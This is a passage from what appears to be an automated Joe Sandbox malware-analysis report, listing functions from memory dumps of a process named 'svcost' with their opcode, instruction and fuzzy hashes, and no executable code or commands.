                                                                                            • Instruction Fuzzy Hash: 2E3148B0919248DFDB01DFA8C8487BDFFF1EB46344F2080BAD105A7291DBB54A89CB06
                                                                                            Function 0211FAB8 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: ce321f135e16f7db1adfbf6db3f2fee7a82acc0c2eeef5a2788c789152c45be4
                                                                                            • Instruction ID: d6efe8f3efbe458361db39c9f81601f73eb954acf3b0fb388322afa605852e2c
                                                                                            • Opcode Fuzzy Hash: ce321f135e16f7db1adfbf6db3f2fee7a82acc0c2eeef5a2788c789152c45be4
                                                                                            • Instruction Fuzzy Hash: CC911974E44318CFDB24DFA4E854BADBBF2FB49304F1080AAE419AB695CB745986CF05
                                                                                            Function 023AAA30 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p
                                                                                            • API String ID: 0-2763268518
                                                                                            • Opcode ID: be38153e6e7e56293e94b981799a78451504c13fb0f82e2ecc21c680db1ce860
                                                                                            • Instruction ID: 8f95e36920f653ce1d20db0cf6f95986f5aa6751ef353479d1639cdea8f61fec
                                                                                            • Opcode Fuzzy Hash: be38153e6e7e56293e94b981799a78451504c13fb0f82e2ecc21c680db1ce860
                                                                                            • Instruction Fuzzy Hash: 43510632A05616CFCB11CF68C4A4A6AFBB2FF85310F158665E5199B341D730F851CBD4
                                                                                            Function 023A9A70 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p!p
                                                                                            • API String ID: 0-1147775804
                                                                                            • Opcode ID: b6d351b39547930463640e8a21c9f6be0f02795260a7013568f2ec5ba8caa898
                                                                                            • Instruction ID: 2a5bc6504592d8225ee6eb5eecd6def5a8458dd0b26bad6b6b070bb157d35b16
                                                                                            • Opcode Fuzzy Hash: b6d351b39547930463640e8a21c9f6be0f02795260a7013568f2ec5ba8caa898
                                                                                            • Instruction Fuzzy Hash: D8510D76610100AFCB459FA4C815E697BB3FF9D31471680A9E2099B372CB32DC21EB51
                                                                                            Function 00691F01 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 872e7bb43e5932875f790759e5cc8016cba0e336e00f9f826f7c65880f895d06
                                                                                            • Instruction ID: 8c380ed6b81901a32bae914ba0ade20be4fd77758f37b75441f02d379ef1d46e
                                                                                            • Opcode Fuzzy Hash: 872e7bb43e5932875f790759e5cc8016cba0e336e00f9f826f7c65880f895d06
                                                                                            • Instruction Fuzzy Hash: D8514574905218CFDB10CFA8D954B9CBBF6FB4A304F2080AAD409AB790D7305989CF00
                                                                                            Function 00699B08 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: b1616484564cc5842524e5be84127adb3e143d21e7e16953e75e6a6d718443ce
                                                                                            • Instruction ID: 959be25409ba088030631ccdd0962efc497a09cc95f0ab4efee0523356659fa3
                                                                                            • Opcode Fuzzy Hash: b1616484564cc5842524e5be84127adb3e143d21e7e16953e75e6a6d718443ce
                                                                                            • Instruction Fuzzy Hash: 07510478A11218CFDF50DFA8D844B9DB7F6FB89310F10406AD409AB795DB349985CF60
                                                                                            Function 0069E628 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 669964c48f9441633645d3e0143b59a916c6e1b926b2b5aebaa31354bb0f9f80
                                                                                            • Instruction ID: 79c408acb050e0a3fb077e295bcf637fb6eab831d41b6919d8b1af0e102db93a
                                                                                            • Opcode Fuzzy Hash: 669964c48f9441633645d3e0143b59a916c6e1b926b2b5aebaa31354bb0f9f80
                                                                                            • Instruction Fuzzy Hash: 9C4113B0E04718DFCB05DFA8D850ADDBBB6FF9A300F10822AE415B7660DB71A985CB40
                                                                                            Function 0211D240 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: oOI
                                                                                            • API String ID: 0-15478488
                                                                                            • Opcode ID: 0db8b85c801a836f99500ebb45321b63ca3aaf21059db51e3a08552d3a7330d9
                                                                                            • Instruction ID: 70c9ef68e85748d123f92ed016f4f488f084a49c1a366a0d87987f3051da19ec
                                                                                            • Opcode Fuzzy Hash: 0db8b85c801a836f99500ebb45321b63ca3aaf21059db51e3a08552d3a7330d9
                                                                                            • Instruction Fuzzy Hash: 8C51C3B4E41208DFDB18DFB9D594AADBBB2BF89304F20912AE415AB360DB359941CF50
                                                                                            Function 0069E638 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: ee54cfd512237be3279a373802a7db3064ae9e5d865e8e3fc9c781a8700b5c88
                                                                                            • Instruction ID: 500e160a6381c63da8f772a5b7a70268c0cf13182a7516a90f3643b7d22c6cc9
                                                                                            • Opcode Fuzzy Hash: ee54cfd512237be3279a373802a7db3064ae9e5d865e8e3fc9c781a8700b5c88
                                                                                            • Instruction Fuzzy Hash: 3C412470E14718DBCB04DFA9D840ADDB7BAFF9A300F10822AE415B7650EB72A985CF40
                                                                                            Function 044BEF08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 044BEFA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520042191.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_44b0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 7b9653144c666736c78b189d06961992f6aa46d5bace404422d580b92a0e9e12
                                                                                            • Instruction ID: bfd30239a3baa60e8ce1ed1c49cdd471adc48fc6b3fc050af4ccd061177fc11a
                                                                                            • Opcode Fuzzy Hash: 7b9653144c666736c78b189d06961992f6aa46d5bace404422d580b92a0e9e12
                                                                                            • Instruction Fuzzy Hash: 043199B4D01258DFDF10CFA9E884ADEFBB5AB49310F24942AE814BB210D735A945CFA4
                                                                                            Function 023A7230 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: f3d45bf144ba998db65a38b5e6bba61f5b4b3638f9f5a07e8bb1d4756fd473ff
                                                                                            • Instruction ID: cfa59fd1e18dea27da65d16987d5631f59d0f68e3c0a414eefb3431917fab7e7
                                                                                            • Opcode Fuzzy Hash: f3d45bf144ba998db65a38b5e6bba61f5b4b3638f9f5a07e8bb1d4756fd473ff
                                                                                            • Instruction Fuzzy Hash: 1B311674E14209CFDB04DFAAD4946AEBBF6EB8A300F10C06AE424B73A5D7349A41CF51
                                                                                            Function 023A7240 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 626253431f9bad03336cc1e94de5ec95af2f36855dd513ca121f9556cd560c7c
                                                                                            • Instruction ID: 9cbd6a1cbfc19be1419f4e06e36572fdc98b4ddfb35e17bf3da121cd760d3f5d
                                                                                            • Opcode Fuzzy Hash: 626253431f9bad03336cc1e94de5ec95af2f36855dd513ca121f9556cd560c7c
                                                                                            • Instruction Fuzzy Hash: 6E31F474E14209DFDB04DFAAD4906AEBBFAEB8A310F108036E425B7365D7349A41CF55
                                                                                            Function 023A6554 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: a6fa0a47b7f53ed0be0dd8580fe60451dead16ec76ac7059e056b4d5bee4b0e7
                                                                                            • Instruction ID: ffd899ce136282fadbb85341bf85963f05b1cd4ac50887e0e3d276fadeac6eaa
                                                                                            • Opcode Fuzzy Hash: a6fa0a47b7f53ed0be0dd8580fe60451dead16ec76ac7059e056b4d5bee4b0e7
                                                                                            • Instruction Fuzzy Hash: 63312670A05218CFDB24DF68C8A97ADB7FAFB5A304F2491B9D009B7656DB745980CF04
                                                                                            Function 00694568 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 8f289acefab74d34ce38b54f19b36a7b317bbefb4d80f1342897c0c0b6fe3f62
                                                                                            • Instruction ID: b8cb7f09c7bc90da9b2fbe6bd2260ba54960cda14561d4c504f471cab8c5e90a
                                                                                            • Opcode Fuzzy Hash: 8f289acefab74d34ce38b54f19b36a7b317bbefb4d80f1342897c0c0b6fe3f62
                                                                                            • Instruction Fuzzy Hash: 8F311874D05228CFDB24DF25C854BAEBBBAFB8A300F1091EAD409A7655DB744E869F00
                                                                                            Function 0069D013 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 031d846de86dc7be4fb48681bfc4bdad2e2a81bcaf2501f1f54042c3045a91a3
                                                                                            • Instruction ID: 6578cf98c394b7528092a42ff0e5518d41dc8b8390a44abb8d4d91791aa18792
                                                                                            • Opcode Fuzzy Hash: 031d846de86dc7be4fb48681bfc4bdad2e2a81bcaf2501f1f54042c3045a91a3
                                                                                            • Instruction Fuzzy Hash: 8641D174E05218CFDB20DF68C9447DDBBF2AF4A314F1081AAD409AB666DB744E85DF00
                                                                                            Function 002FC930 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: b61d4b330547534777c9c9ab78807d99cc6d1ba5726e26b9107a7d2985cd9b83
                                                                                            • Instruction ID: 4c4a73db5a31c5ba71f17a92fdd222cbcca63c58513f6b1b6692f2f0aed2830d
                                                                                            • Opcode Fuzzy Hash: b61d4b330547534777c9c9ab78807d99cc6d1ba5726e26b9107a7d2985cd9b83
                                                                                            • Instruction Fuzzy Hash: 8A212774D1520D8BDB08DFAAC9047BEFAF1AB8A340F209436D525B3294D7B44945CF55
                                                                                            Function 0069D3F8 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ILuV
                                                                                            • API String ID: 0-1855505789
                                                                                            • Opcode ID: cd219190bf20d8726ecbdf51035b83eea74eb3541fa5f2c24b7c5f6b07105bfe
                                                                                            • Instruction ID: fab39118e457ecb7f265b4de3914acc1dd06fd9366375678bec7e14e837d3a5a
                                                                                            • Opcode Fuzzy Hash: cd219190bf20d8726ecbdf51035b83eea74eb3541fa5f2c24b7c5f6b07105bfe
                                                                                            • Instruction Fuzzy Hash: F8218D74E04209CFDF04DF69D854AAEBBF6EB8A300F108076D005AB365D7346942CF51
                                                                                            Function 002F88C8 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 91f39a1229f242d3172e1f692d8ed189923f3cf815f391e5d47f33ad77848d77
                                                                                            • Instruction ID: af48865ee32dfd0c51c54c49746c3ba11fdf60d999fd036090d685be62ea4b84
                                                                                            • Opcode Fuzzy Hash: 91f39a1229f242d3172e1f692d8ed189923f3cf815f391e5d47f33ad77848d77
                                                                                            • Instruction Fuzzy Hash: 7031047091920CDFDB40EFA8C9487BEFBF1EB4A344F6080B9D115A3750DBB44A888B16
                                                                                            Function 006969D9 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: b71881cd57e015e9b5596b002df9a26242a2f2dd01fd0d58e91cc03ba83b634f
                                                                                            • Instruction ID: 0a4100179c1926df4f8ab7d91f2a6f551defefaa0b0bde272040a383ba400fc0
                                                                                            • Opcode Fuzzy Hash: b71881cd57e015e9b5596b002df9a26242a2f2dd01fd0d58e91cc03ba83b634f
                                                                                            • Instruction Fuzzy Hash: 4F41E578A01228CFCB64EF24D841B9EB7F6FB99300F1081AAA44DA7759CB305E85CF45
                                                                                            Function 0069D408 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ILuV
                                                                                            • API String ID: 0-1855505789
                                                                                            • Opcode ID: d9816a62ebf3ea885e8ee5101599bb14ec09b8db78180a82d26bea891a8f370a
                                                                                            • Instruction ID: 612b646c615cdb7c335bce608cc24165b678d776c924e4766aa59e7ed6ad838f
                                                                                            • Opcode Fuzzy Hash: d9816a62ebf3ea885e8ee5101599bb14ec09b8db78180a82d26bea891a8f370a
                                                                                            • Instruction Fuzzy Hash: 06215C74E04209DFDF04DFA9D854AAEB7FAEB89700F108476D009AB764D734A942CF91
                                                                                            Function 00698471 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: e23a8e7350945217f7d85c4ff21b8f9713eedaef42a1b65761d349678763c431
                                                                                            • Instruction ID: 65576cc94edaa724301ee92fb969de76b8e767e8253f72258f6e2ac199690b53
                                                                                            • Opcode Fuzzy Hash: e23a8e7350945217f7d85c4ff21b8f9713eedaef42a1b65761d349678763c431
                                                                                            • Instruction Fuzzy Hash: 38215774D04209CFCB00DF98D854BEEB7FAFB8A304F108069E119A7795CB785A498F91
                                                                                            Function 02115618 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 9a862e13177ab1d4c8ea17265e64cfb3354c025a09ee05e8c0111122f843a41c
                                                                                            • Instruction ID: 07b8801372b9321fff9d3c179c166ed2ab3f56f5bb17520884d9536eb6e135e8
                                                                                            • Opcode Fuzzy Hash: 9a862e13177ab1d4c8ea17265e64cfb3354c025a09ee05e8c0111122f843a41c
                                                                                            • Instruction Fuzzy Hash: F82123B0D85209DBDB08DFAAD4586EEBBB6EB89315F50903AD019B2250D7744A44CBE1
                                                                                            Function 00698480 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 3cf359f01daf372fbac8b8deba2e0f1590750e8eb28e0ab74ee017baaa4b0f29
                                                                                            • Instruction ID: 46331eac66b3396999881491bbe1efe211ca2af4429f03e79f97ecbf3672dda2
                                                                                            • Opcode Fuzzy Hash: 3cf359f01daf372fbac8b8deba2e0f1590750e8eb28e0ab74ee017baaa4b0f29
                                                                                            • Instruction Fuzzy Hash: B5213674E04209CFCF00DFA8D854BEEBBFAFB8A304F108025E115A7695CB785A498B91
                                                                                            Function 0069CD1D Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 0d974a866db3985f1f81df08f14c10bcc0f2a20f0644a7087c73a79df8579d28
                                                                                            • Instruction ID: 1e15b6a7fc452311c4c06a84f8115dc3e2d4650821a8014d0b4d33f21287c36f
                                                                                            • Opcode Fuzzy Hash: 0d974a866db3985f1f81df08f14c10bcc0f2a20f0644a7087c73a79df8579d28
                                                                                            • Instruction Fuzzy Hash: 4F31D474A05318CFEB20CFA8C944BEDBBF6AB09354F1081AAD409BB691D7755E85DF10
                                                                                            Function 05403967 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 2cae67459eb8f0e6caeedf37b5541cf88fa2b8e5f0e4990188b3857d69204bb0
                                                                                            • Instruction ID: 07d43ead26817c87bbf32e98cc6d2fe9036cedf25cabdce1209ae87f18fcbdf2
                                                                                            • Opcode Fuzzy Hash: 2cae67459eb8f0e6caeedf37b5541cf88fa2b8e5f0e4990188b3857d69204bb0
                                                                                            • Instruction Fuzzy Hash: 4B21AE78A41229CFEB24DF18C948ADABBF1BF48304F9055E6E80DA7380D7709E848F05
                                                                                            Function 023A6DDF Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: c122703f42008e7f523314264d514591f5019bb97e87bcf5f7498ac67a94e3fd
                                                                                            • Instruction ID: 57dfcd9d70fe59aade54d54298b32fc28b2d823b4ceb3da5ed248691cba085f5
                                                                                            • Opcode Fuzzy Hash: c122703f42008e7f523314264d514591f5019bb97e87bcf5f7498ac67a94e3fd
                                                                                            • Instruction Fuzzy Hash: 65110638A04658CFCB50EF64CD4879DB7B1EBD9311F1080AA940ABB398DB744E88CF10
                                                                                            Function 02116E8E Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H
                                                                                            • API String ID: 0-2852464175
                                                                                            • Opcode ID: dbe96941ac51c9ad9687eb71396065418c564349614fe9a1afcd7243f23911b3
                                                                                            • Instruction ID: b9ec29559f0db8d195a81b99e9ddd2780f246066202c6f0cf79f97c436cee991
                                                                                            • Opcode Fuzzy Hash: dbe96941ac51c9ad9687eb71396065418c564349614fe9a1afcd7243f23911b3
                                                                                            • Instruction Fuzzy Hash: F901D6B4C8821DCFEF24CF24C988BEDBAB0AB09355F5161BAC41976244C7750AC4CF48
                                                                                            Function 0069EA1D Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: a40bab1d6e7ebaafd8831570db9adc4010ea0e7e6f216271d1c2a2a8a973320c
                                                                                            • Instruction ID: 0ebd725add4249b6b346d713493910b06aca1d1b6a365613048d0ad93160d37c
                                                                                            • Opcode Fuzzy Hash: a40bab1d6e7ebaafd8831570db9adc4010ea0e7e6f216271d1c2a2a8a973320c
                                                                                            • Instruction Fuzzy Hash: 67010434A00B18CBCB60EFA8D880798B7B1FF89310F10869AE559B7750DB70AAC5CF50
                                                                                            Function 0069990F Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 2bb54f246bcc7f70d46d788ffb07433d6694bf14443437b430dd776697800a29
                                                                                            • Instruction ID: f175a70f0b995accdb79e72e6fba5dcadbe629194804a300a8c2bcd247ae9b3c
                                                                                            • Opcode Fuzzy Hash: 2bb54f246bcc7f70d46d788ffb07433d6694bf14443437b430dd776697800a29
                                                                                            • Instruction Fuzzy Hash: CC016978D083488FDB50EFA4C05029EBBF5EF8A310F24405EC825A7392DB389945CF10
                                                                                            Function 023A669D Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 58cc031dbbbb0dd97c37d23ad16d859ecea8d1890f21d6c00e5f85937b338c60
                                                                                            • Instruction ID: 3a97065f74e44160c0ef16be79744b8a32f9ea6042ae88e050359b41baf812e3
                                                                                            • Opcode Fuzzy Hash: 58cc031dbbbb0dd97c37d23ad16d859ecea8d1890f21d6c00e5f85937b338c60
